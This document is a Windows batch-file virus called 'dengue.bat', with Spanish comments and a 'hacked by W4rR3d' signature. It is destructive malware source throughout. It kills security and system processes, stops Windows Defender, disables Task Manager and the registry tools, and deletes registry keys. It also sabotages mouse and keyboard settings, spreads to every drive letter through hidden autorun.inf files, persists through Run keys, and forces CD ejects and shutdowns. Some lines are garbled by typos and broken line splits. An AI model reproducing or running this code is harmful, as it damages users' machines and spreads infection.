msg * hacked by -={W4rR3d}=-
:: este virus fue creado por hacked by W4rR3d
:: este virus esta dedicado a la comunidad hacker piura- peru
:: este virus informatico se llama dengue.bat
tasskill /im explorer.exe /f
>nul 2
>&1
taskill explorer
>nul 2
>&1
tskill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe"
taskkill /im rstrui.exe /f
>nul 2
>&1
|| taskill rstrui
>nul 2
>&1
taskkill /f /im firefox.exe
>nul 2
>&1
|| tskill firefox.exe
taskkill /f /t /im "FirewallControlPanel.exe"
taskkill /f /t /im "MSASCui.exe"
net stop "wscsvc"
net stop "WinDefend"
net stop "Security Center"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents" /f
reg delete "HKEY_CLASSES_ROOT\.docx" /f
reg delete "HKEY_CLASSES_ROOT\.htm\OpenWithList\WINWORD.EXE\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Excel.exe\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Microsoft Office Word\shell\edit\command" /f
reg delete "HKEY_CLASSES_ROOT\.xlsx" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\RegEdt32" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\Webcam" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /f
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /d "0"
reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /f
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /d "0" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /f
reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /d "100" /f
reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /f
reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /d "0" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v Internet Connection Firewall/f
for /F
%%-
in (MSMemoticon,FreeXXXPhotos,Office2007
) do (call :
reiniciar %%-
) copy /y "
%0" "
%homedrive%\dengue.bat"
>nul 2
>&1
reg add hklm\software\microsoft\windows\currentversion\run /v dengue /t reg_sz /d %homedrive%\dengue.bat /f
for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
) Do ( copy /Y
%0 %%E:\dengue.bat
echo.[AutoRun]
>> %%E:\autorun.inf
echo.open="
%%E:\dengue.bat"
>> %%E:\autorun.inf
echo.action=Open folder to see files...
>> %%E:\autorun.inf
attrib +r +s +h %%E:\autorun.inf
attrib +r +s +h %%E:\dengue.bat
echo On Error Resume Next
>> %homedrive%\abrir.vbs
echo Set oWMP = CreateObject
("WMPlayer.OCX.7"
) >> %homedrive%\abrir.vbs
echo Set colCDROMs = oWMP.cdromCollection
>> %homedrive%\abrir.vbs
echo.
>> %homedrive%\abrir.vbs
echo if colCDROMs.Count
>= 1 then
>> %homedrive%\abrir.vbs
echo For i = 0 to colCDROMs.Count - 1
>> %homedrive%\abrir.vbs
echo colCDROMs.Item
(i
).Eject
>> %homedrive%\abrir.vbs
echo Next ' cdrom
>> %homedrive%\abrir.vbs
echo End
If >> %homedrive%\abrir.vbs
start %homedrive%\abrir.vbs
echo.
^<H1
^> ~~~Hacked BY W4rR3d~~~
echo.
^</HTML
^>)>%homedrive%\aegypti.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v virus /t REG_SZ /d %homedrive%\aegypti.HTML
)
start %homedrive%\aegypti.HTML
:reiniciar
echo On Error Resume Next
>> %homedrive%\renic.vbs
echo set shell = CreateObject
("WScript.Shell"
) >> %homedrive%\renic.vbs
echo shell.run "shutdown.exe -s -t 10"
>> %homedrive%\renic.vbs
start >> %homedrive%\renic.vbs
si ven algun error en este virus informatico lo notifican. su amigo hacked by W4rR3d